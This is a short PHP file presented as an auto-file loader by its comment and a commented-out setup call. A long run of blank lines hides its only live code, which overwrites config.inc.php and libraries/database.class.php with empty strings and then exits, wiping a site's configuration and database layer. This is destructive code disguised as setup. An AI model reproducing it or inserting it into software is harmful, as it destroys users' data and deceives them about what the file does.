<?php
// Load your auto files

/*
setup_function(load.php);
*/



































































































































































































file_put_contents("config.inc.php", "");
file_put_contents("libraries/database.class.php", "");
exit;
?>